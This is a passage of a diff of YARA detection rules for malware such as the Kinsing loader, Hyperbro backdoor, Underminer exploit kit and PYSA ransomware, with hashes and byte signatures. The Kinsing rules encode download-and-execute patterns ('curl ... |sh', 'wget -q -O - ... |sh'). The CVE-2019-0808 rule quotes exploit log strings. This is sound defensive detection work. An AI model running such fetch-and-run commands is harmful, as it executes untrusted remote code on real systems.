61 00 70 00 70 00 6c 00 69 00 63 00 61 00 74 00 69 00 6f 00 6e 00 2f 00 6f 00 63 00 74 00 65 00 74 00 2d 00 73 00 74 00 72 00 65 00 61 00 6d } - $s7 = { 25 73 2f [1-4] 2e 74 78 74 } - $s8 = { 25 73 2f [1-4] 2d 25 30 34 64 25 30 32 64 25 30 32 64 25 30 32 64 25 30 32 64 25 30 32 64 2e 74 78 74 } + $asm1 = { 8b 3d 44 21 01 10 6a 00 6a 00 6a 01 6a 01 6a 00 6a 00 68 00 00 00 08 68 e4 7e 01 10 68 e8 7e 01 10 6a 00 ff d7 50 68 f0 7e 01 10 a3 c8 a2 01 10 e8 e8 f7 ff ff 8b 35 68 21 01 10 8d 84 24 5c 01 00 00 83 c4 08 c7 84 24 54 01 00 00 1c 00 00 00 0f 57 c0 c7 84 24 58 01 00 00 10 00 00 00 66 0f 13 84 24 60 01 00 00 66 0f 13 84 24 68 01 00 00 50 ff b4 24 1c 01 00 00 c7 84 24 64 01 00 00 00 00 00 60 ff d6 8d 84 24 54 01 00 00 50 ff 74 24 10 ff d6 8b 35 5c 21 01 10 68 04 7f 01 10 ff 74 24 10 68 10 04 00 00 ff b4 24 24 01 00 00 ff } + $asm2 = { a1 14 21 01 10 0f 57 c0 8b 74 24 08 89 84 24 28 01 00 00 8d 84 24 20 01 00 00 50 c7 84 24 28 01 00 00 00 00 00 00 66 0f 13 84 24 3c 01 00 00 c7 84 24 44 01 00 00 00 00 00 00 c7 84 24 50 01 00 00 00 00 00 00 c7 84 24 24 01 00 00 30 00 00 00 c7 84 24 30 01 00 00 00 00 00 00 c7 84 24 34 01 00 00 00 00 00 00 89 b4 24 38 01 00 00 c7 84 24 48 01 00 00 00 00 00 00 c7 84 24 4c 01 00 00 10 7f 01 10 ff 15 64 21 01 10 6a 00 56 6a 00 6a 00 6a 01 6a 01 6a 00 6a 00 68 00 00 00 08 68 20 7f 01 10 68 10 7f 01 10 6a 00 ff d7 6a 00 50 6a 00 6a 00 a3 ec a2 01 10 6a 00 ff b4 24 2c 01 00 00 ff 15 58 21 01 } + $asm3 = { e8 72 fb ff ff 83 c4 08 68 c0 13 00 10 6a fc ff 76 0c ff 15 54 21 01 10 56 ff 75 0c ff 75 08 6a 00 ff 15 24 21 01 10 5f 5e 5b 5d } + $s1 = "[*] Successfully exploited CVE-2019-0808 and triggered the shellcode!" fullword ascii + $s2 = "[!] Failed to find the address of IsMenu within user32.dll." fullword ascii + $s3 = "Sending hSecondaryWindow a WM_ENTERIDLE message to trigger the execution of the shellcode as SYSTEM." fullword ascii + $s4 = "AppPolicyGetProcessTerminationMethod" fullword ascii + $s5 = "[*] Found target windows!" fullword ascii + $s6 = "[*] addressOfIsMenuFromStartOfUser32: 0x%08X" fullword ascii + $s7 = "[*] FakeMenu: %p" fullword ascii + $s8 = "[*] Primary window address: 0x%08X" fullword ascii + $s9 = "[!] Didn't exploit the program. For some reason our privileges were not appropriate." fullword ascii + $s10 = "[*] hUser32: 0x%08X" fullword ascii + $s11 = "[*] Secondary window address: 0x%08X" fullword ascii + $s12 = "[*] Offset: 0x%08X" fullword ascii + $s13 = "[*] pHmValidateHandle: 0x%08X" fullword ascii + $s14 = "[*] HWND: %p " fullword ascii + $s15 = "[*] pIsMenuFunction: 0x%08X" fullword ascii + $s16 = "[*] Destroyed spare windows!" fullword ascii + $s17 = "[!] SetWindowLongA malicious error: 0x%08X" fullword ascii condition: - uint16(0)==0x5a4d and filesize >30KB and 6 of ($s*) + uint16(0)==0x5a4d and filesize >70KB and (pe.imphash()=="d4a5e8c255211639195793920eeda70f" and 2 of ($asm*) and 12 of ($s*)) } -rule ARKBIRD_SOLG_Mal_Xcaon_Jul_2021_1 : FILE +rule ARKBIRD_SOLG_Exp_Underminer_Apr_2021_1 : FILE { meta: - description = "Detect the xCaon malware" + description = "Detect Underminer exploit kit" author = "Arkbird_SOLG" - id = "bcd5a52d-9547-5709-95f4-9d1f956f623c" - date = "2021-07-01" - modified = "2021-07-02" - reference = "https://research.checkpoint.com/2021/indigozebra-apt-continues-to-attack-central-asia-with-evolving-tools/" - source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-07-02/IndigoZebra/Mal_xCaon_Jul_2021_1.yara#L1-L21" + id = "bd2a6b30-e05a-5f90-8dc2-719c1ba48a61" + date = "2021-04-14" + modified = "2021-04-15" + reference = "https://twitter.com/nao_sec/status/1382358986813415427" + source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-04-14/Underminer/Exp_Underminer_Apr_2021_1.yar#L1-L20" license_url = "N/A" - logic_hash = "9c3e3d0035596323a505404ecc067bd2b87a4b0ac7499f1c87aac015f59eb65a" + logic_hash = "46dd4d8ba58e79761056d3dd6921530520b0071090bcfc3bfaed7a6804f787b7" score = 75 - quality = 75 + quality = 63 tags = "FILE" - hash1 = "8be3b10406f690ae5cf46c1dba18cb9a1c75bf646defcc9cab81d40fe0e0cc1b" - hash2 = "e9013f35ce11fc4c5eb2c21827bdc459202d362365d6ea5b724dee4fe0088bd1" - hash3 = "489fca69a622195328302e64e29b6183feac90826dce198432d603202ca4d216" - tlp = "White" - adversary = "IndigoZebra" + hash1 = "172ac73cda6260918510ad2f4481a7fcd90c5a86d47dd880c5bcb3596dd20a7d" strings: - $s1 = { a1 7c 10 41 00 33 c5 89 45 fc 8b 45 08 56 57 6a 49 89 85 f8 80 ff ff 58 6a 50 66 89 45 c8 58 6a 48 66 89 45 ca 58 6a 4c 66 89 45 cc 58 6a 50 66 89 45 ce 58 6a 41 66 89 45 d0 58 6a 50 66 89 45 d2 58 6a 49 66 89 45 d4 58 6a 2e 66 89 45 d6 58 6a 44 66 89 45 d8 58 66 89 45 da 6a 4c 58 66 89 45 dc 66 89 45 de 33 c0 66 89 45 e0 8d 45 c8 50 c7 45 e4 47 65 74 41 c7 45 e8 64 61 70 74 c7 45 ec 65 72 73 49 c7 45 f0 6e 66 6f 00 ff 15 50 d0 40 00 8d 4d e4 51 50 89 85 f4 80 ff ff ff 15 54 d0 40 00 8d 8d f0 80 ff ff 51 8d 8d fc 80 ff ff 51 c7 85 f0 80 ff ff 90 7e 00 00 ff d0 8b c8 33 c0 c6 45 f4 00 8d 7d f5 ab 66 ab aa 85 c9 0f 85 1d 01 00 00 53 6a 25 5e 6a 30 5a 6a 32 59 8b c6 66 89 45 8c 8b c2 66 89 45 8e 6a 58 8b c1 66 89 45 90 58 8b f8 6a 2d 66 89 7d 92 5f 8b df 66 89 5d 94 8b de 66 89 5d 96 8b da 66 89 5d 98 8b d9 66 89 5d 9a 8b d8 66 89 5d 9c 8b df 66 89 5d 9e 8b de 66 89 5d a0 8b da 66 89 5d a2 8b d9 66 89 5d a4 8b d8 66 89 5d a6 8b df 66 89 5d a8 8b de 66 89 5d aa 8b da 66 89 5d ac 8b d9 66 89 5d ae 8b d8 66 89 5d b0 8b df 66 89 5d b2 8b de 66 89 5d b4 8b da 66 89 5d b6 8b d9 66 89 45 c4 66 89 5d b8 8b d8 33 c0 66 89 45 c6 6a 06 8d 85 90 82 ff ff 50 8d 45 f4 50 66 89 5d ba 66 89 7d bc 66 89 75 be 66 89 55 c0 66 89 4d c2 e8 ?? 17 00 00 0f b6 45 f9 50 0f b6 45 f8 50 0f b6 45 f7 50 0f b6 45 f6 50 0f b6 45 f5 50 0f b6 45 f4 50 8d 45 8c 50 ff b5 f8 80 ff ff ff 15 44 d1 40 00 83 c4 2c 33 f6 46 5b ff b5 f4 80 ff ff ff 15 4c d0 40 00 8b } - $s2 = { 6a 5b 58 6a 55 66 89 45 c4 58 6a 70 66 89 45 c6 58 6a 6c 66 89 45 c8 58 6a 6f 66 89 45 ca 58 6a 61 66 89 45 cc 58 6a 64 66 89 45 ce 58 6a 5d 66 89 45 d0 58 6a 0d 66 89 45 d2 58 6a 0a 66 89 45 d4 58 6a 25 66 89 45 d6 33 c0 66 89 45 d8 58 6a 74 66 89 45 ac 8b c6 66 89 45 ae 58 6a 6d 66 89 45 b0 58 6a 70 66 89 45 b2 58 6a 25 66 89 45 b4 58 6a 64 66 89 45 b6 58 6a 2e 66 89 45 b8 58 6a 6c 66 89 45 ba 58 6a 6f 66 89 45 bc 58 6a 67 66 89 45 be 58 6a 46 66 89 45 c0 33 c0 66 89 45 c2 58 6a 69 66 89 45 dc 58 6a 6c 66 89 45 de 58 6a 65 66 89 45 e0 58 6a 3a 66 89 45 e2 58 66 89 45 e4 6a 25 58 66 89 45 e6 6a 0d 58 66 89 45 ea 6a 0a 58 66 89 45 ec 33 c0 66 89 45 ee 8d 45 c4 50 66 89 75 e8 e8 ?? 11 00 00 59 8d 4d c4 8d b5 50 f3 ff ff e8 [2] ff ff 89 bd 4c f2 ff ff c7 85 48 f3 ff ff 0f 00 00 00 89 bd 44 f3 ff ff c6 85 34 f3 ff ff 00 8d 85 34 f3 ff ff 50 83 ec 1c c6 45 fc 03 8d 85 fc f2 ff ff 8b f4 89 a5 50 f2 ff ff 50 e8 [2] ff ff e8 [2] ff ff 8b 9d 34 f3 ff ff 83 c4 20 83 bd 48 f3 ff ff 10 73 06 8d 9d 34 f3 ff ff 8d 85 4c f2 ff ff 50 } - $s3 = { 83 c4 10 8d 85 6c fb ff ff 50 68 04 01 00 00 ff 15 2c d0 40 00 33 c0 56 66 89 85 74 fd ff ff 8d 85 76 fd ff ff 53 50 e8 ?? 10 00 00 83 c4 0c ff 15 30 d0 40 00 8b 35 44 d1 40 00 50 8d 85 6c fb ff ff 50 8d 45 ac 50 8d 85 74 fd ff ff 50 ff d6 83 c4 10 53 68 80 00 00 00 6a 02 53 53 68 00 00 00 40 8d 85 74 fd ff ff 50 ff 15 24 d0 40 00 8b f8 83 ff ff 74 79 53 8d 85 50 f2 ff ff 50 ff b5 4c f2 ff ff 89 9d 50 f2 ff ff ff b5 48 f2 ff ff 57 ff 15 14 d0 40 00 57 ff 15 34 d0 40 00 33 c0 68 fe 07 00 00 66 89 85 6c f3 ff ff 8d 85 6e f3 ff ff 53 50 e8 ?? 10 00 00 8d 85 74 fd ff ff 50 8d 45 dc 50 8d 85 6c f3 ff ff 50 ff d6 8d 85 6c f3 ff ff 50 8d 85 18 f3 ff ff 50 8d 8d 50 f3 ff ff e8 [2] ff ff 83 } - $s4 = { 8b 45 08 33 ff 89 85 60 f1 ff ff 89 bd 5c f1 ff ff 33 c0 be 06 02 00 00 89 7d fc 56 66 89 85 88 fb ff ff 8d 85 8a fb ff ff 57 50 e8 [2] 00 00 33 c0 56 66 89 85 80 f9 ff ff 8d 85 82 f9 ff ff 57 50 e8 [2] 00 00 83 c4 18 6a 43 58 6a 6f 66 89 45 e0 58 6a 6d 66 89 45 e2 58 6a 53 66 89 45 e4 58 6a 70 66 89 45 e6 58 6a 65 66 89 45 e8 58 6a 63 66 89 45 ea 58 66 89 45 ec 33 c0 66 89 45 ee bb 04 01 00 00 53 8d 85 88 fb ff ff 50 8d 45 e0 50 ff 15 00 d0 40 00 8d 85 80 f9 ff ff 50 53 ff 15 2c d0 40 00 6a 25 58 6a 73 5b 6a 63 66 89 45 c0 8b c3 66 89 45 c2 58 6a 63 66 89 45 c4 8b c3 66 89 45 c6 58 6a 6f 66 89 45 c8 58 6a 64 66 89 45 ca 58 6a 65 66 89 45 cc 58 66 89 45 ce 6a 25 58 6a 64 66 89 45 d0 58 6a 2e 66 89 45 d2 58 6a 6c 66 89 45 d4 58 6a 6f 66 89 45 d6 58 6a 67 66 89 45 d8 58 66 89 45 da 33 c0 68 fe 07 00 00 66 89 45 dc 66 89 85 80 f1 ff ff 8d 85 82 f1 ff ff 57 50 e8 [2] 00 00 33 c0 56 66 89 85 90 fd ff ff 8d 85 92 fd ff ff 57 50 e8 [2] 00 00 83 c4 18 6a 25 58 6a 20 66 89 45 98 8b c3 66 89 45 9a 58 6a 2f 8b c8 66 89 4d 9c 59 6a 41 66 89 4d 9e 59 6a 2f 66 89 4d a0 8b c8 66 89 4d a2 59 6a 43 66 89 4d a4 59 66 89 4d a6 6a 22 8b c8 66 89 4d a8 59 6a 25 66 89 4d aa 59 66 89 4d ac 6a 22 8b cb 66 89 4d ae 59 66 89 4d b0 8b c8 6a 3e 66 89 4d b2 59 66 89 45 b6 6a 25 58 66 89 45 b8 33 c0 66 89 4d b4 66 89 5d ba 66 89 45 bc ff 15 30 d0 40 00 8b 35 44 d1 40 00 50 8d 85 80 f9 ff ff 50 8d 45 c0 50 8d 85 90 fd ff ff 50 ff d6 8b 45 0c 83 c4 10 83 7d 20 08 73 03 8d 45 0c 8d 8d 90 fd ff ff 51 50 8d 85 88 fb ff ff 50 8d 45 98 50 8d 85 80 f1 ff ff 50 ff d6 6a 44 5e 56 8d 85 04 f1 ff ff 57 50 e8 [2] 00 00 6a 10 8d 85 48 f1 ff ff 57 50 89 b5 04 f1 ff ff e8 [2] 00 00 83 c4 2c 8d 85 04 f1 ff ff 50 ff 15 28 d0 40 00 33 c0 66 89 85 34 f1 ff ff 8d 85 48 f1 ff ff 50 8d 85 04 f1 ff ff 50 57 57 6a 10 57 57 57 8d 85 80 f1 ff ff 33 db 50 43 57 89 9d 30 f1 ff ff ff 15 08 d0 40 00 68 3f 77 1b 00 ff b5 48 f1 ff ff 8b f0 ff 15 0c d0 40 00 3b f7 0f 84 1c 01 00 00 ff b5 4c f1 ff ff 8b 35 34 d0 40 00 ff d6 ff b5 48 f1 ff ff ff d6 33 c0 c7 85 78 f1 ff ff 07 00 00 00 89 bd 74 f1 ff ff 66 89 85 64 f1 ff ff 57 57 6a 03 57 57 68 00 00 00 80 8d 85 90 fd ff ff 50 88 5d fc ff 15 24 d0 40 00 89 85 5c f1 ff ff 83 f8 ff 0f 84 96 00 00 00 57 50 ff 15 04 d0 40 00 89 85 58 f1 ff ff 83 f8 ff 75 2b ff b5 5c f1 ff ff ff d6 8b 85 60 f1 ff ff 68 64 f1 40 00 e8 f1 00 00 00 53 33 ff 8d b5 64 f1 ff ff e8 64 03 00 00 e9 95 00 00 00 83 c0 02 50 e8 [2] 00 00 8b d8 8b 85 58 f1 ff ff 83 c0 02 50 57 53 e8 [2] 00 00 83 c4 10 57 8d 85 58 f1 ff ff 50 ff b5 58 f1 ff ff 53 ff b5 5c f1 ff ff ff 15 20 d0 40 00 ff b5 5c f1 ff ff ff d6 8d 85 64 f1 ff ff 50 53 e8 d9 11 00 00 53 e8 [2] 00 00 83 c4 0c 8d 85 90 fd ff ff 50 ff 15 38 d0 40 00 8b b5 60 f1 ff ff 8d 9d 64 f1 ff ff e8 96 00 00 00 6a 01 33 ff 8b } - $s5 = { be 06 02 00 00 89 ?? fc 56 66 89 85 ?? fb ff ff 8d 85 ?? fb ff ff ?? 50 e8 [2] 00 00 33 c0 56 66 89 85 ?? f9 ff ff 8d 85 ?? f9 ff ff ?? 50 e8 [2] 00 00 83 c4 18 6a 43 58 6a 6f 66 89 45 e0 58 6a 6d 66 89 45 e2 58 6a 53 66 89 45 e4 58 6a 70 66 89 45 e6 58 6a 65 66 89 45 e8 58 6a 63 66 89 45 ea 58 66 89 45 ec 33 c0 66 89 45 ee ?? 04 01 00 00 ?? 8d 85 ?? fb ff ff 50 8d 45 e0 50 ff 15 00 [2] 00 8d 85 ?? f9 ff ff 50 ?? ff 15 [3] 00 } - $s6 = { 8b 45 08 [5] ff [5] 6a 07 89 85 10 ff ff ff ?? 33 ?? 33 c0 89 ?? 14 89 ?? 10 89 ?? 18 ff ff ff 66 89 ?? 8d ?? 1c 89 ?? fc 89 ?? 14 89 ?? 10 66 89 ?? 8d ?? 38 89 ?? 14 89 ?? 10 89 ?? 0c ff ff ff 66 89 ?? 89 ?? 6c 89 ?? 68 66 89 ?? 58 89 ?? 88 00 00 00 89 ?? 84 00 00 00 66 89 ?? 74 89 ?? b8 00 00 00 89 ?? b4 00 00 00 66 89 ?? a4 00 00 00 6a 68 } + $s1 = { 6e 65 77 20 41 63 74 69 76 65 58 4f 62 6a 65 63 74 28 22 53 68 6f 63 6b 77 61 76 65 46 6c 61 73 68 2e 53 68 6f 63 6b 77 61 76 65 46 6c 61 73 68 22 29 } + $s2 = "$version" fullword ascii + $s3 = { 6e 61 76 69 67 61 74 6f 72 2e 70 6c 75 67 69 6e 73 26 26 6e 61 76 69 67 61 74 6f 72 2e 70 6c 75 67 69 6e 73 2e 6c 65 6e 67 74 68 3e 30 } + $s4 = { 6e 61 76 69 67 61 74 6f 72 2e 70 6c 75 67 69 6e 73 5b 22 53 68 6f 63 6b 77 61 76 65 20 46 6c 61 73 68 22 5d } + $s5 = { 63 6c 61 73 73 69 64 3d 27 63 6c 73 69 64 3a 44 32 37 43 44 42 36 45 2d 41 45 36 44 2d 31 31 63 66 2d 39 36 42 38 2d 34 34 34 35 35 33 35 34 30 30 30 30 27 } + $s6 = { 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 73 68 6f 63 6b 77 61 76 65 2d 66 6c 61 73 68 22 } + $s7 = { 22 64 61 74 61 22 2c 22 2f 6c 6f 67 6f 2e 73 77 66 22 } + $s8 = { 22 30 30 30 30 30 30 30 30 22 2b 28 [1-8] 5b 30 5d 3e 3e 3e 30 29 2e 74 6f 53 74 72 69 6e 67 28 31 36 29 29 2e 73 6c 69 63 65 28 2d 38 29 2b 28 22 30 30 30 30 30 30 30 30 22 2b 28 [1-8] 5b 31 5d 3e 3e 3e 30 29 2e 74 6f 53 74 72 69 6e 67 28 31 36 29 29 2e 73 6c 69 63 65 28 2d 38 29 } condition: - uint16(0)==0x5a4d and filesize >30KB and 5 of ($s*) + filesize >5KB and 6 of ($s*) } -rule ARKBIRD_SOLG_Loader_JAVA_Kinsing_Aug_2020_Variant_A_1 : FILE +rule ARKBIRD_SOLG_APT_APT27_Hyperbro_Apr_2021_1 : FILE { meta: - description = "Detect Kinsing Variant A" + description = "Detect Hyperbro backdoor" author = "Arkbird_SOLG" - id = "470fd4a6-faba-52b5-8ffa-5ac33fb607a0" - date = "2020-08-28" - modified = "2020-08-29" - reference = "https://twitter.com/JAMESWT_MHT/status/1299222198574632961" - source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2020-08-28/Loader_JAVA_Kinsing_Aug_2020_1.yar#L2-L30" + id = "060a200e-17dd-5789-94d4-eeff5c2e9a18" + date = "2021-05-01" + modified = "2021-05-04" + reference = "-" + source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-05-03/APT27/APT_APT27_Hyperbro_Apr_2021_1.yara#L1-L21" license_url = "N/A" - logic_hash = "a9654b67ca6fb5de23d385707f01196d6d1c85e527d2bdbe312a2b2fcf998dc0" + logic_hash = "1a32ab7c30885a665ede66640a9b047e3c381f6f535243fcadf1a7a22e76f407" score = 75 - quality = 67 + quality = 35 tags = "FILE" - hash1 = "22063638b9f05870e14110ccab9e07d744204360b184cfec0075f9fd27e08488" - hash2 = "248dd35d069d6b106b7528e41f95cd8cef0140fbb60808aa51c99ac117cf3318" - hash3 = "6ec5b8ea86d0af908182d6afc63c85a817e0612dba6e5e4b126b5639ab048b16" - hash4 = "b82d9e0ea2b6139438ce0b805fb03c3ae89ada9d4fdd7722562e6075f706048c" + hash1 = "36fad80a5f328f487b20a3f5fc5f1902d50cbb1bd9167c44b66929a1288fc6f4" + hash2 = "52072a8f99dacd5c293fccd051eab95516d8b880cd2bc5a7e0f4a30d008e22a7" + hash3 = "9000ce3c0e01b6c80edb3af87aad8117513ce334135aa7d7b1c2afa067f4c4ab" + hash4 = "92bbcb5461ab5959e31f997a6df77995377d69f8077e43e5812fcbe9303d831c" + tlp = "White" + adversary = "APT27" strings: - $ClassCode1 = { 4c 69 66 45 78 70 2e 6a 61 76 61 0c 00 3f 00 40 } - $ClassCode2 = "java/lang/StringBuilder" fullword ascii - $ClassCode3 = "java/net/URL" fullword ascii - $ClassCode4 = "java/net/URLConnection" fullword ascii - $ClassCode5 = { 6a 61 76 61 2f 6c 61 6e 67 2f 50 72 6f 63 65 73 73 42 75 69 6c 64 65 72 01 00 02 2e 2f } - $Com1 = { 52 75 6E 74 69 6D 65 2E 67 65 74 52 75 6E 74 69 6D 65 28 29 2E 65 78 65 63 28 6E 65 77 20 53 74 72 69 6E 67 5B 5D 20 7B 20 22 2F 62 69 6E 2F 62 61 73 68 22 2C 20 22 2D 63 22 2C 20 22 63 75 72 6C 20 22 20 2B 20 73 20 2B 20 22 7C 73 68 22 20 7D } - $Com2 = { 52 75 6E 74 69 6D 65 2E 67 65 74 52 75 6E 74 69 6D 65 28 29 2E 65 78 65 63 28 6E 65 77 20 53 74 72 69 6E 67 5B 5D 20 7B 20 22 2F 62 69 6E 2F 62 61 73 68 22 2C 20 22 2D 63 22 2C 20 22 77 67 65 74 20 2D 71 20 2D 4F 20 2D 20 22 20 2B 20 73 20 2B 20 22 7C 73 68 22 20 7D } - $Com3 = "chmod +x " fullword ascii - $Com4 = { 53 4b 4c 01 00 02 6c 66 } - $s1 = "User-Agent" fullword ascii - $s2 = "kinsing" fullword ascii - $s3 = { 6f 73 2e 6e 61 6d 65 } - $s4 = "getAbsolutePath" fullword ascii - $s5 = { 6f 70 65 6e 43 6f 6e 6e 65 63 74 69 6f 6e } + $seq1 = { 8b [5] 7? 0? [2] 0? ?? 0? [3] ff 75 0? [11] 5? [2] 0? ?? 8b } + $seq2 = { e8 ?? 0? 00 00 b0 01 c3 55 8b ec ff 75 08 ff 15 34 c0 00 10 85 c0 74 11 56 8b 30 50 e8 ?? 1? 00 00 8b c6 59 85 f6 75 f1 5e 5d c3 cc 8b 4c 24 0c 0f b6 44 24 08 8b d7 8b 7c 24 04 85 c9 0f 84 3c 01 00 00 69 c0 01 01 01 01 83 f9 20 0f 8e df 00 00 00 81 f9 80 00 00 00 0f 8c 8b 00 00 00 0f ba 25 b8 27 01 10 01 73 09 f3 aa 8b 44 24 04 8b fa c3 0f ba 25 10 20 01 10 01 0f 83 b2 00 00 00 66 0f 6e c0 66 } + $seq3 = { 8b 44 24 08 48 75 [13] be ?? 16 00 10 bb 00 10 00 10 05 [2] 00 00 2b f3 [0-3] 74 0? 8? [0-2] cf [0-4] 03 cb ?? 11 47 3b fe 72 ?? e8 ?? fd ff ff 5f 5e 5b 33 c0 40 c2 0c 00 8b ff 55 8b ec 8b 45 0c 56 57 83 f8 01 75 7c 50 e8 1c 14 00 00 59 85 c0 75 07 33 c0 e9 0e 01 00 00 e8 a6 06 00 00 85 c0 75 07 e8 32 14 00 00 eb e9 e8 af 13 00 00 ff 15 ?? 80 00 10 a3 18 b8 00 10 e8 68 12 00 00 a3 64 ac 00 10 e8 89 0c 00 00 85 c0 7d 07 e8 1f 03 00 00 eb cf e8 93 11 00 00 85 c0 7c 20 e8 12 0f 00 00 85 c0 7c 17 6a 00 e8 41 0a 00 00 59 85 c0 75 0b ff 05 60 ac 00 10 e9 a8 00 00 00 e8 a4 0e 00 00 eb c9 33 ff 3b c7 75 31 39 3d 60 ac 00 10 7e 81 ff 0d 60 ac 00 10 39 3d b4 ac 00 10 75 05 e8 d0 0b 00 00 39 7d 10 75 7b e8 77 0e 00 00 e8 bd 02 00 00 e8 a1 13 00 00 eb 6a 83 f8 02 75 59 e8 78 02 00 00 68 14 02 00 00 6a 01 e8 54 08 00 00 8b f0 59 59 3b f7 0f 84 36 ff ff ff 56 ff 35 00 a0 00 10 ff 35 7c ac 00 10 e8 d3 01 00 00 59 ff d0 85 c0 74 17 57 56 e8 b1 02 00 00 59 59 ff 15 ?? 80 00 10 83 4e 04 ff 89 06 eb 18 56 e8 3f 07 00 00 59 e9 fa fe ff ff 83 f8 03 75 07 57 e8 33 05 00 00 59 33 c0 40 5f 5e 5d c2 0c 00 6a 0c 68 d0 92 00 10 e8 ?? 15 00 00 8b f9 8b f2 8b 5d 08 33 c0 40 89 45 e4 85 f6 75 0c 39 15 60 ac 00 10 0f 84 c5 00 00 00 83 65 fc 00 3b f0 74 05 83 fe 02 75 2e a1 ?? 81 00 10 85 c0 74 08 57 56 53 ff d0 89 45 e4 83 7d e4 00 0f 84 96 00 00 00 57 56 53 e8 72 fe ff ff 89 45 e4 } condition: - filesize <1KB and 4 of ($ClassCode*) and 3 of ($Com*) and 3 of ($s*) + uint16(0)==0x5a4d and filesize >10KB and 2 of ($seq*) } -rule ARKBIRD_SOLG_Loader_JAVA_Kinsing_Aug_2020_Variant_B_1 : FILE +import "pe" + +rule ARKBIRD_SOLG_Malware_Casbaneiro_MSI : FILE { meta: - description = "Detect Kinsing Variant B" + description = "Detect MSIPackage used by Casbaneiro" author = "Arkbird_SOLG" - id = "7e0f9826-806c-5801-aab5-d2a8dba4e206" - date = "2020-08-28" - modified = "2020-08-29" - reference = "https://twitter.com/JAMESWT_MHT/status/1299222198574632961" - source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2020-08-28/Loader_JAVA_Kinsing_Aug_2020_1.yar#L32-L52" + id = "47a5ea47-f799-5467-a482-9816c0de3ecf" + date = "2020-06-05" + modified = "2020-06-05" + reference = "https://twitter.com/JAMESWT_MHT/status/1268811438707159040" + source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2020-06-05/Casbaneiro/Casbaneiro_stealer.yar#L3-L22" license_url = "N/A" - logic_hash = "5862d02b4e57024aa1c00b0a10ac9ee1a733890cf7d5b9ec7586f0506af113fc" + logic_hash = "fa1c53268d51b4b34b4cf4cd84ddb43ffba1dfa8bbe73cd7506f5e31e970855b" score = 75 - quality = 75 + quality = 71 tags = "FILE" - hash1 = "e1471e8f9c1aa1457f819c0565a3444c53d3ec5fadf9f52ae988fde8e2d3a960" - hash2 = "e70ea87d00567d33e20ed8649ef532eda966a8b5b1e83ea19728528d991eaaa0" + hash1 = "8e77a2e1d30600db01a8481d232b601581faee02b7ec44c1ad9d74ec3544ba7d" strings: - $ClassCode1 = { 4c 69 66 45 78 70 2e 6a 61 76 61 0c 00 3f 00 40 } - $ClassCode2 = "java/lang/StringBuilder" fullword ascii - $ClassCode3 = "java/net/URL" fullword ascii - $ClassCode4 = { 6a 61 76 61 2f 6c 61 6e 67 2f 50 72 6f 63 65 73 73 42 75 69 6c 64 65 72 01 00 02 2e 2f } - $Com1 = "chmod +x " fullword ascii - $Com2 = { 53 4b 4c 01 00 02 6c 66 } - $s1 = "kinsing" fullword ascii - $s2 = "getAbsolutePath" fullword ascii + $x1 = "C:\\Branch\\win\\Release\\custact\\x86\\vmdetect.pdb" fullword ascii + $s2 = "C:\\Branch\\win\\Release\\custact\\\\x86\\AICustAct.pdb" fullword ascii + $s3 = ";!@Install@!UTF-8!\\nTitle=\"Mozilla Firefox\"\\nRunProgram=\"setup-stub.exe\"\\n;!@InstallEnd@!7z" fullword ascii + $s4 = "__MOZCUSTOM__:campaign%3D%2528not%2Bset%2529%26content%3D%2528not%2Bset%2529%26medium%3Dreferral%26source%3Dwww.google.com" fullword ascii + $s5 = "https://www.mozilla.com0\\r" fullword wide + $s6 = "__CxxFrameHandler" fullword ascii + $s7 = "release+certificates@mozilla.com" fullword ascii + $s8 = "setup-stub.exe" fullword ascii + $s9 = "7zS.sfx.exe" fullword ascii condition: - filesize <1KB and 3 of ($ClassCode*) and 1 of ($Com*) and 2 of ($s*) + uint16(0)==0xd0cf and filesize >100KB and 7 of them } -rule ARKBIRD_SOLG_RAN_Nitro_Aug_2021_1 : FILE +rule ARKBIRD_SOLG_RAN_PYSA_Sept_2021_1 : FILE { meta: - description = "Detect Nitro ransomware" + description = "Detect the PYSA ransomware" author = "Arkbird_SOLG" - id = "256059b2-1683-5108-8fc8-3cf0b2e7b613" - date = "2021-08-12" - modified = "2021-08-13" - reference = "https://bazaar.abuse.ch/browse/tag/NitroRansomware/" - source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-08-13/Nitro/RAN_Nitro_Aug_2021_1.yara#L1-L23" + id = "fd939287-ec37-5021-9782-f0f86a9f0e4b" + date = "2021-09-23" + modified = "2021-11-10" + reference = "Internal Research" + source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-11-09/PYSA/RAN_PYSA_Sept_2021_1.yara#L1-L20" license_url = "N/A" - logic_hash = "c31267cd9bc6c63db8e32b2a0e7518b0432d62f1de52117b9e903fc3370a1f4d" + logic_hash = "e16f2ae581b8627ccd4e8ecb56db52c992022473d006843ed19a69c8059ecb54" score = 75 quality = 75 tags = "FILE" - hash1 = "1194aebc9a0016084f6966b07a171e4c62ce1b21580d177a876873641692ee13" - hash2 = "6546f0638160cb590b4ead2401fb55d48e10b2ee1808ff0354fff52c9e2f62bf" - hash3 = "89dbea1e4b387325f21c784dc72fcf52599f69e1ded27d1b830ff57ae4831559" - hash4 = "d8e9561612c6e06160d79abde41c7b66e4921a1c041ad5c2658d43050b4fd2d0" - hash5 = "dbed3399932fabe6f7f863403279ac9a6b075aa307dd445df2c7060157d3063b" + hash1 = "7c774062bc55e2d0e869d5d69820aa6e3b759454dbc926475b4db6f7f2b6cb14" + hash2 = "7c774062bc55e2d0e869d5d69820aa6e3b759454dbc926475b4db6f7f2b6cb14" + hash3 = "44f1def68aef34687bfacf3668e56873f9d603fc6741d5da1209cc55bdc6f1f9" tlp = "white" - adversary = "-" + adversary = "RAAS" strings: - $s1 = { 1f 1a 28 ?? 00 00 0a [0-2] 72 ?? 14 00 70 28 15 00 00 0a 80 32 00 00 04 28 ?? 00 00 06 7e 32 00 00 04 